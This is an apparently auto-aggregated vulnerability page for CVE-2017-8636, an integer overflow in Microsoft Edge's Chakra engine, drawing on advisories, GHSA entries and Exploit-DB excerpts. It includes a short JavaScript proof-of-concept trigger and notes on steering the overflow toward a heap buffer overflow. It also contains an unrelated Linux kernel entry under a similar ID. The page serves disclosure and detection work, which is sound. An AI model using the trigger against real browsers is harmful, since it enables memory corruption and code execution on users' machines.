CVE-2017-8636
published 2017-08-08CVE-2017-8636: Microsoft browsers in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511…
PriorityP272high7.5CVSS 3.0
AVNACHPRNUIRSUCHIHAH
EXPLOIT
EPSS
72.12%
99.4th percentile
Microsoft browsers in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allow an attacker to execute arbitrary code in the context of the current user due to the way that Microsoft browser JavaScript engines render content when handling objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-8634, CVE-2017-8635, CVE-2017-8638, CVE-2017-8639, CVE-2017-8640, CVE-2017-8641, CVE-2017-8645, CVE-2017-8646, CVE-2017-8647, CVE-2017-8655, CVE-2017-8656, CVE-2017-8657, CVE-2017-8670, CVE-2017-8671, CVE-2017-8672, and CVE-2017-8674.
Affected
8 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
| microsoft_corporation | microsoft_scripting_engine | — | — |
| msrc | internet_explorer_10 | — | — |
| msrc | internet_explorer_11 | — | — |
| msrc | internet_explorer_9 | — | — |
| msrc | microsoft_edge | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandlet args = new Array(0x10000);
args = args.fill(0x1234).join(', ');
eval('new Array(' + args + ')');↗
- →CVE-2017-8636 is triggered via an integer overflow in the Chakra JIT EmitNew function: argCount is a 16-bit Js::ArgSlot, incremented past 0xFFFF wraps to 0, bypassing the OutOfMemory guard and leading to heap/stack buffer overflow in InterpreterStackFrame allocation. ↗
- →PoC trigger pattern: constructing a JavaScript call/new expression with exactly 0x10000 (65536) arguments causes the 16-bit argCount to overflow to 0, bypassing the bounds check. Monitor for eval() calls constructing extremely large argument lists. ↗
- →The crash manifests in chakra.dll at Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix with an access violation (code c0000005) on a write instruction — monitor for MicrosoftEdgeCP.exe crashing with second-chance AV in chakra.dll. ↗
- →The overflow can force heap allocation of the InterpreterStackFrame (varAllocCount > InterpreterStackFrame::LocalsThreshold), enabling a heap buffer overflow rather than a stack overflow — the attacker controls allocation size via argument count. ↗
- →A secondary NULL pointer dereference path exists: when spreadArgCount overflows to 0, spreadIndices is never initialized, and subsequent access to spreadIndices->elements[spreadIndex++] dereferences a null pointer in EmitArgs. ↗
- →The root overflow occurs at pnode->sxCall.argCount increment: when argCount==0xFFFF, argCount++ wraps to 0, and the guard 'if (argCount != (Js::ArgSlot)argCount)' never fires because both sides are already the same 16-bit type. ↗
- ·Exploit requires convincing a user to visit a specially crafted website in Microsoft Edge, or embedding a malicious ActiveX control in an Office document or application hosting the scripting engine. ↗
- ·Exploitation likelihood is rated 'More Likely' for both latest and older software releases per Microsoft's assessment; however, Microsoft's advisory states the vulnerability has not been publicly exploited at time of publication. ↗
CVSS provenance
nvdv3.07.5HIGHCVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv2.07.6HIGHAV:N/AC:H/Au:N/C:C/I:C/A:C
vendor_msrc4.2MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-g8p9-4pfp-r8v4: Microsoft Edge in Microsoft Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of
ghsa_unreviewed·2022-05-17·CVSS 7.5
CVE-2017-8655 [HIGH] CWE-119 GHSA-g8p9-4pfp-r8v4: Microsoft Edge in Microsoft Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of
Microsoft Edge in Microsoft Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user due to the way that Microsoft browser JavaScript engines render content when handling objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-8634, CVE-2017-8635, CVE-2017-8636, CVE-2017-8638, CVE-2017-8639, CVE-2017-8640, CVE-2017-8641, CVE-2017-8645, CVE-2017-8646, CVE-2017-8647, CVE-2017-8656, CVE-2017-8657, CVE-2017-8670, CVE-2017-8671, CVE-2017-8672, and CVE-2017-8674.
GHSA
GHSA-jw33-q8g2-4wfm: Microsoft Edge in Microsoft Windows 10 1607, 1703, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current
ghsa_unreviewed·2022-05-17·CVSS 7.5
CVE-2017-8670 [HIGH] CWE-119 GHSA-jw33-q8g2-4wfm: Microsoft Edge in Microsoft Windows 10 1607, 1703, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current
Microsoft Edge in Microsoft Windows 10 1607, 1703, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user due to the way that Microsoft browser JavaScript engines render content when handling objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-8634, CVE-2017-8635, CVE-2017-8636, CVE-2017-8638, CVE-2017-8639, CVE-2017-8640, CVE-2017-8641, CVE-2017-8645, CVE-2017-8646, CVE-2017-8647, CVE-2017-8655, CVE-2017-8656, CVE-2017-8657, CVE-2017-8671, CVE-2017-8672, and CVE-2017-8674.
GHSA
GHSA-mhjh-m6x5-jvw5: Microsoft Edge in Microsoft Windows 10 1703 allows an attacker to execute arbitrary code in the context of the current user due to the way that Micros
ghsa_unreviewed·2022-05-17·CVSS 7.5
CVE-2017-8674 [HIGH] CWE-119 GHSA-mhjh-m6x5-jvw5: Microsoft Edge in Microsoft Windows 10 1703 allows an attacker to execute arbitrary code in the context of the current user due to the way that Micros
Microsoft Edge in Microsoft Windows 10 1703 allows an attacker to execute arbitrary code in the context of the current user due to the way that Microsoft browser JavaScript engines render content when handling objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-8634, CVE-2017-8635, CVE-2017-8636, CVE-2017-8638, CVE-2017-8639, CVE-2017-8640, CVE-2017-8641, CVE-2017-8645, CVE-2017-8646, CVE-2017-8647, CVE-2017-8655, CVE-2017-8656, CVE-2017-8657, CVE-2017-8670, CVE-2017-8671, and CVE-2017-8672.
GHSA
GHSA-9q4w-xv93-m563: Microsoft Edge in Microsoft Windows 10 1511, 1607, 1703, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the cu
ghsa_unreviewed·2022-05-17·CVSS 7.5
CVE-2017-8672 [HIGH] CWE-119 GHSA-9q4w-xv93-m563: Microsoft Edge in Microsoft Windows 10 1511, 1607, 1703, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the cu
Microsoft Edge in Microsoft Windows 10 1511, 1607, 1703, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user due to the way that Microsoft browser JavaScript engines render content when handling objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-8634, CVE-2017-8635, CVE-2017-8636, CVE-2017-8638, CVE-2017-8639, CVE-2017-8640, CVE-2017-8641, CVE-2017-8645, CVE-2017-8646, CVE-2017-8647, CVE-2017-8655, CVE-2017-8656, CVE-2017-8657, CVE-2017-8670, CVE-2017-8671, and CVE-2017-8674.
GHSA
GHSA-6hf6-hm5c-w8wg: Microsoft Edge in Windows 10 1607, 1703, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user due t
ghsa_unreviewed·2022-05-17·CVSS 7.5
CVE-2017-8639 [HIGH] CWE-119 GHSA-6hf6-hm5c-w8wg: Microsoft Edge in Windows 10 1607, 1703, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user due t
Microsoft Edge in Windows 10 1607, 1703, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user due to the way that Microsoft browser JavaScript engines render content when handling objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-8634, CVE-2017-8635, CVE-2017-8636, CVE-2017-8638, CVE-2017-8640, CVE-2017-8641, CVE-2017-8645, CVE-2017-8646, CVE-2017-8647, CVE-2017-8655, CVE-2017-8656, CVE-2017-8657, CVE-2017-8670, CVE-2017-8671, CVE-2017-8672, and CVE-2017-8674.
GHSA
GHSA-x77g-74w8-hg5v: Microsoft Edge in Windows 10 1703 allows an attacker to execute arbitrary code in the context of the current user due to the way that Microsoft browse
ghsa_unreviewed·2022-05-17·CVSS 7.5
CVE-2017-8647 [HIGH] CWE-119 GHSA-x77g-74w8-hg5v: Microsoft Edge in Windows 10 1703 allows an attacker to execute arbitrary code in the context of the current user due to the way that Microsoft browse
Microsoft Edge in Windows 10 1703 allows an attacker to execute arbitrary code in the context of the current user due to the way that Microsoft browser JavaScript engines render content when handling objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-8634, CVE-2017-8635, CVE-2017-8636, CVE-2017-8638, CVE-2017-8639, CVE-2017-8640, CVE-2017-8641, CVE-2017-8645, CVE-2017-8646, CVE-2017-8655, CVE-2017-8656, CVE-2017-8657, CVE-2017-8670, CVE-2017-8671, CVE-2017-8672, and CVE-2017-8674.
GHSA
GHSA-w885-jw3g-7qf8: Microsoft browsers in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8
ghsa_unreviewed·2022-05-17·CVSS 7.5
CVE-2017-8641 [HIGH] CWE-119 GHSA-w885-jw3g-7qf8: Microsoft browsers in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8
Microsoft browsers in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allow an attacker to execute arbitrary code in the context of the current user due to the way that Microsoft browser JavaScript engines render when handling objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-8634, CVE-2017-8635, CVE-2017-8636, CVE-2017-8638, CVE-2017-8639, CVE-2017-8640, CVE-2017-8645, CVE-2017-8646, CVE-2017-8647, CVE-2017-8655, CVE-2017-8656, CVE-2017-8657, CVE-2017-8670, CVE-2017-8671, CVE-2017-8672, and CVE-2017-8674.
GHSA
GHSA-fpwp-r2g2-q9mp: Microsoft Edge in Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the curren
ghsa_unreviewed·2022-05-17·CVSS 7.5
CVE-2017-8640 [HIGH] CWE-119 GHSA-fpwp-r2g2-q9mp: Microsoft Edge in Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the curren
Microsoft Edge in Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user due to the way that Microsoft browser JavaScript engines render content when handling objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-8634, CVE-2017-8635, CVE-2017-8636, CVE-2017-8638, CVE-2017-8639, CVE-2017-8641, CVE-2017-8645, CVE-2017-8646, CVE-2017-8647, CVE-2017-8655, CVE-2017-8656, CVE-2017-8657, CVE-2017-8670, CVE-2017-8671, CVE-2017-8672, and CVE-2017-8674.
GHSA
GHSA-pq46-h8gg-4pjh: Microsoft Edge in Microsoft Windows 10 1511, 1607, 1703, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the cu
ghsa_unreviewed·2022-05-17·CVSS 7.5
CVE-2017-8671 [HIGH] CWE-119 GHSA-pq46-h8gg-4pjh: Microsoft Edge in Microsoft Windows 10 1511, 1607, 1703, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the cu
Microsoft Edge in Microsoft Windows 10 1511, 1607, 1703, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user due to the way that Microsoft browser JavaScript engines render content when handling objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-8634, CVE-2017-8635, CVE-2017-8636, CVE-2017-8638, CVE-2017-8639, CVE-2017-8640, CVE-2017-8641, CVE-2017-8645, CVE-2017-8646, CVE-2017-8647, CVE-2017-8655, CVE-2017-8656, CVE-2017-8657, CVE-2017-8670, CVE-2017-8672, and CVE-2017-8674.
GHSA
GHSA-xqp7-4r9c-vqq2: Microsoft Edge in Microsoft Windows 10 1607, 1703, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current
ghsa_unreviewed·2022-05-17·CVSS 7.5
CVE-2017-8656 [HIGH] CWE-119 GHSA-xqp7-4r9c-vqq2: Microsoft Edge in Microsoft Windows 10 1607, 1703, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current
Microsoft Edge in Microsoft Windows 10 1607, 1703, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user due to the way that Microsoft browser JavaScript engines render content when handling objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-8634, CVE-2017-8635, CVE-2017-8636, CVE-2017-8638, CVE-2017-8639, CVE-2017-8640, CVE-2017-8641, CVE-2017-8645, CVE-2017-8646, CVE-2017-8647, CVE-2017-8655, CVE-2017-8657, CVE-2017-8670, CVE-2017-8671, CVE-2017-8672, and CVE-2017-8674.
GHSA
GHSA-pfrv-7vc2-g369: Microsoft Edge in Windows 10 1511, 1607, 1703, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user
ghsa_unreviewed·2022-05-17·CVSS 7.5
CVE-2017-8645 [HIGH] CWE-119 GHSA-pfrv-7vc2-g369: Microsoft Edge in Windows 10 1511, 1607, 1703, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user
Microsoft Edge in Windows 10 1511, 1607, 1703, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user due to the way that Microsoft browser JavaScript engines render content when handling objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-8634, CVE-2017-8635, CVE-2017-8636, CVE-2017-8638, CVE-2017-8639, CVE-2017-8640, CVE-2017-8641, CVE-2017-8646, CVE-2017-8647, CVE-2017-8655, CVE-2017-8656, CVE-2017-8657, CVE-2017-8670, CVE-2017-8671, CVE-2017-8672, and CVE-2017-8674.
GHSA
GHSA-5h64-f677-76hx: Microsoft Edge in Windows 10 1511, 1607, 1703, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user
ghsa_unreviewed·2022-05-17·CVSS 7.5
CVE-2017-8646 [HIGH] CWE-119 GHSA-5h64-f677-76hx: Microsoft Edge in Windows 10 1511, 1607, 1703, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user
Microsoft Edge in Windows 10 1511, 1607, 1703, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user due to the way that Microsoft browser JavaScript engines render content when handling objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-8634, CVE-2017-8635, CVE-2017-8636, CVE-2017-8638, CVE-2017-8639, CVE-2017-8640, CVE-2017-8641, CVE-2017-8645, CVE-2017-8647, CVE-2017-8655, CVE-2017-8656, CVE-2017-8657, CVE-2017-8670, CVE-2017-8671, CVE-2017-8672, and CVE-2017-8674.
GHSA
GHSA-6q9p-g6mq-pjc8: Microsoft Edge in Microsoft Windows 10 1703 allows an attacker to execute arbitrary code in the context of the current user due to the way that Micros
ghsa_unreviewed·2022-05-17·CVSS 7.5
CVE-2017-8638 [HIGH] CWE-119 GHSA-6q9p-g6mq-pjc8: Microsoft Edge in Microsoft Windows 10 1703 allows an attacker to execute arbitrary code in the context of the current user due to the way that Micros
Microsoft Edge in Microsoft Windows 10 1703 allows an attacker to execute arbitrary code in the context of the current user due to the way that Microsoft browser JavaScript engines render content when handling objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-8634, CVE-2017-8635, CVE-2017-8636, CVE-2017-8639, CVE-2017-8640, CVE-2017-8641, CVE-2017-8645, CVE-2017-8646, CVE-2017-8647, CVE-2017-8655, CVE-2017-8656, CVE-2017-8657, CVE-2017-8670, CVE-2017-8671, CVE-2017-8672, and CVE-2017-8674.
GHSA
GHSA-x64p-468c-m65v: Microsoft Edge in Microsoft Windows 10 1511, 1607, 1703, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the cu
ghsa_unreviewed·2022-05-17·CVSS 7.5
CVE-2017-8657 [HIGH] CWE-119 GHSA-x64p-468c-m65v: Microsoft Edge in Microsoft Windows 10 1511, 1607, 1703, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the cu
Microsoft Edge in Microsoft Windows 10 1511, 1607, 1703, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user due to the way that Microsoft browser JavaScript engines render content when handling objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-8634, CVE-2017-8635, CVE-2017-8636, CVE-2017-8638, CVE-2017-8639, CVE-2017-8640, CVE-2017-8641, CVE-2017-8645, CVE-2017-8646, CVE-2017-8647, CVE-2017-8655, CVE-2017-8656, CVE-2017-8670, CVE-2017-8671, CVE-2017-8672, and CVE-2017-8674.
GHSA
GHSA-4f64-6gfv-xcjj: Microsoft Edge in Microsoft Windows 10 1703 allows an attacker to execute arbitrary code in the context of the current user due to the way that Micros
ghsa_unreviewed·2022-05-14·CVSS 7.5
CVE-2017-8634 [HIGH] CWE-119 GHSA-4f64-6gfv-xcjj: Microsoft Edge in Microsoft Windows 10 1703 allows an attacker to execute arbitrary code in the context of the current user due to the way that Micros
Microsoft Edge in Microsoft Windows 10 1703 allows an attacker to execute arbitrary code in the context of the current user due to the way that Microsoft browser JavaScript engines render content when handling objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-8635, CVE-2017-8636, CVE-2017-8638, CVE-2017-8639, CVE-2017-8640, CVE-2017-8641, CVE-2017-8645, CVE-2017-8646, CVE-2017-8647, CVE-2017-8655, CVE-2017-8656, CVE-2017-8657, CVE-2017-8670, CVE-2017-8671, CVE-2017-8672, and CVE-2017-8674.
GHSA
GHSA-xvj3-97mf-29q5: Microsoft browsers in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8
ghsa_unreviewed·2022-05-14·CVSS 7.5
CVE-2017-8636 [HIGH] CWE-119 GHSA-xvj3-97mf-29q5: Microsoft browsers in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8
Microsoft browsers in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allow an attacker to execute arbitrary code in the context of the current user due to the way that Microsoft browser JavaScript engines render content when handling objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-8634, CVE-2017-8635, CVE-2017-8638, CVE-2017-8639, CVE-2017-8640, CVE-2017-8641, CVE-2017-8645, CVE-2017-8646, CVE-2017-8647, CVE-2017-8655, CVE-2017-8656, CVE-2017-8657, CVE-2017-8670, CVE-2017-8671, CVE-2017-8672, and CVE-2017-8674.
GHSA
GHSA-9424-w7q3-6p43: Microsoft browsers in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8
ghsa_unreviewed·2022-05-14·CVSS 7.5
CVE-2017-8635 [HIGH] CWE-119 GHSA-9424-w7q3-6p43: Microsoft browsers in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8
Microsoft browsers in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allow an attacker to execute arbitrary code in the context of the current user due to the way that JavaScript engines render when handling objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-8634, CVE-2017-8636, CVE-2017-8638, CVE-2017-8639, CVE-2017-8640, CVE-2017-8641, CVE-2017-8645, CVE-2017-8646, CVE-2017-8647, CVE-2017-8655, CVE-2017-8656, CVE-2017-8657, CVE-2017-8670, CVE-2017-8671, CVE-2017-8672, and CVE-2017-8674.
Microsoft
Scripting Engine Memory Corruption Vulnerability
vendor_msrc·2017-08-08·CVSS 4.2
CVE-2017-8636 [HIGH] Scripting Engine Memory Corruption Vulnerability
Scripting Engine Memory Corruption Vulnerability
Description: A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.
In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft browsers and then convince a user to view the website. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the related rendering engine. The attacker could also take advantage of compromised websites, and websites that acc
No detection rules found.
Exploit-DB
Microsoft Edge Chakra - Buffer Overflow
exploitdb·2017-08-17
CVE-2017-8636 Microsoft Edge Chakra - Buffer Overflow
Microsoft Edge Chakra - Buffer Overflow
---
sxCall.argCount; //pnode->sxCall.argCount=0xFFFF
argCount++; // include "this" //overflow!!!! argCount==0
BOOL fSideEffectArgs = FALSE;
unsigned int tmpCount = CountArguments(pnode->sxCall.pnodeArgs, &fSideEffectArgs);
Assert(argCount == tmpCount);
if (argCount != (Js::ArgSlot)argCount)
{
Js::Throw::OutOfMemory();
}
byteCodeGenerator->StartStatement(pnode);
// Start call, allocate out param space
funcInfo->StartRecordingOutArgs(argCount);
// Assign the call target operand(s), putting them into expression temps if necessary to protect
// them from side-effects.
if (fSideEffectArgs)
{
SaveOpndValue(pnode->sxCall.pnodeTarget, funcInfo);
}
if (pnode->sxCall.pnodeTarget->nop == knopSuper)
{
EmitSuperFieldPatch(funcInfo, pnode, byteCodeGenerato
Exploit-DB
Microsoft Edge Chakra - NULL Pointer Dereference
exploitdb·2017-08-17
CVE-2017-8636 Microsoft Edge Chakra - NULL Pointer Dereference
Microsoft Edge Chakra - NULL Pointer Dereference
---
**spreadIndices = nullptr)
{
// This function emits the arguments for a call.
// ArgOut's with uses immediately following defs.
EmitArgListStart(thisLocation, byteCodeGenerator, funcInfo, callSiteId);
Js::RegSlot evalLocation = Js::Constants::NoRegister;
//
// If Emitting arguments for eval and assigning registers, get a tmpLocation for eval.
// This would be used while generating frameDisplay in EmitArgListEnd.
//
if (fIsEval)
{
evalLocation = funcInfo->AcquireTmpRegister();
}
if (spreadArgCount > 0) //spreadArgCount==0 because of overflow****
{
const size_t extraAlloc = spreadArgCount * sizeof(uint32);
Assert(spreadIndices != nullptr);
*spreadIndices = AnewPlus(byteCodeGenerator->GetAllocator(), extraAlloc, Js::AuxArray, spreadAr
Exploit-DB
Microsoft Edge Chakra - Heap Buffer Overflow
exploitdb·2017-08-17
CVE-2017-8636 Microsoft Edge Chakra - Heap Buffer Overflow
Microsoft Edge Chakra - Heap Buffer Overflow
---
IsCoroutine())
{
[...]
}
else
{
InterpreterStackFrame::Setup setup(function, args);
size_t varAllocCount = setup.GetAllocationVarCount();
//printf("varAllocCount: %d(%X)\r\n", varAllocCount, varAllocCount);
size_t varSizeInBytes = varAllocCount * sizeof(Var);
//
// Allocate a new InterpreterStackFrame instance on the interpreter's virtual stack.
//
DWORD_PTR stackAddr;
// If the locals area exceeds a certain limit, allocate it from a private arena rather than
// this frame. The current limit is based on an old assert on the number of locals we would allow here.
if (varAllocCount > InterpreterStackFrame::LocalsThreshold) //we can make this condition satisfied so the buffer will be allocated on the heap instead of the stack!!!
{
ArenaAlloc
Exploit-DB
Microsoft Edge Chakra - 'EmitNew' Integer Overflow
exploitdb·2017-08-17
CVE-2017-8636 Microsoft Edge Chakra - 'EmitNew' Integer Overflow
Microsoft Edge Chakra - 'EmitNew' Integer Overflow
---
sxCall.argCount;
argCount++; // include "this"
BOOL fSideEffectArgs = FALSE;
unsigned int tmpCount = CountArguments(pnode->sxCall.pnodeArgs, &fSideEffectArgs);
Assert(argCount == tmpCount);
if (argCount != (Js::ArgSlot)argCount)
{
Js::Throw::OutOfMemory();
}
...
}
"Js::ArgSlot" is a 16 bit unsigned integer type. And "argCount" is of the type "Js::ArgSlot". So "if (argCount != (Js::ArgSlot)argCount)" has no point. It can't prevent the integer overflow at all.
PoC:
-->
let args = new Array(0x10000);
args = args.fill(0x1234).join(', ');
eval('new Array(' + args + ')');
Talos
Microsoft Patch Tuesday - August 2017
blogs_talos·2017-08-08·CVSS 7.8
[HIGH] Microsoft Patch Tuesday - August 2017
Microsoft has released its monthly set of security advisories for vulnerabilities that have been identified and addressed in various products. This month's advisory release addresses 48 new vulnerabilities with 25 of them rated critical, 21 rated important, and 2 rated moderate. These vulnerabilities impact Edge, Hyper-V, Internet Explorer, Remote Desktop Protocol, Sharepoint, SQL Server, the Windows Subsystem for Linux, and more. In addition, Microsoft is also releasing an update for Adobe Flash Player embedded in Edge and Internet Explorer.
## Vulnerabilities Rated Critical The following vulnerabilities are rated "critical" by Microsoft:
- CVE-2017-8653 - Microsoft Browser Memory Corruption Vulnerability
- CVE-2017-8669 - Microsoft Browser Memory Corruption Vulnerability
- CVE-2017-866
Talos
Microsoft Patch Tuesday - August 2017
blogs_talos·2017-08-08·CVSS 7.8
[HIGH] Microsoft Patch Tuesday - August 2017
## Microsoft Patch Tuesday - August 2017
Microsoft has released its monthly set of security advisories for vulnerabilities that have been identified and addressed in various products. This month's advisory release addresses 48 new vulnerabilities with 25 of them rated critical, 21 rated important, and 2 rated moderate. These vulnerabilities impact Edge, Hyper-V, Internet Explorer, Remote Desktop Protocol, Sharepoint, SQL Server, the Windows Subsystem for Linux, and more. In addition, Microsoft is also releasing an update for Adobe Flash Player embedded in Edge and Internet Explorer.
## Vulnerabilities Rated Critical The following vulnerabilities are rated "critical" by Microsoft:
CVE-2017-8653 - Microsoft Browser Memory Corruption Vulnerability
CVE-2017-8669 - Microsoft Browser Memory
Bugzilla
CVE-2016-8636 kernel: Integer overflow in the RDMA over infiniband software implementation
bugzilla·2017-02-14·CVSS 7.8
CVE-2016-8636 [HIGH] CVE-2016-8636 kernel: Integer overflow in the RDMA over infiniband software implementation
CVE-2016-8636 kernel: Integer overflow in the RDMA over infiniband software implementation
An integer overflow vulnerability was found in the Linux kernel in the software implementation of the RDMA protocol over infiniband.
References:
http://seclists.org/oss-sec/2017/q1/404
https://eyalitkin.wordpress.com/2017/02/11/cve-publication-cve-2016-8636/
Upstream patch:
https://github.com/torvalds/linux/commit/647bf3d8a8e5777319da92af672289b2a6c4dc66
Discussion:
Statement:
This issue did not affect the versions of the Linux kernel as shipped with Red Hat Enterprise Linux as they did not include the software implementation of the RDMA protocol over infiniband.
http://www.securityfocus.com/bid/100056http://www.securitytracker.com/id/1039094http://www.securitytracker.com/id/1039095https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8636https://www.exploit-db.com/exploits/42466/https://www.exploit-db.com/exploits/42467/https://www.exploit-db.com/exploits/42468/https://www.exploit-db.com/exploits/42478/http://www.securityfocus.com/bid/100056http://www.securitytracker.com/id/1039094http://www.securitytracker.com/id/1039095https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8636https://www.exploit-db.com/exploits/42466/https://www.exploit-db.com/exploits/42467/https://www.exploit-db.com/exploits/42468/https://www.exploit-db.com/exploits/42478/
2017-08-08
Published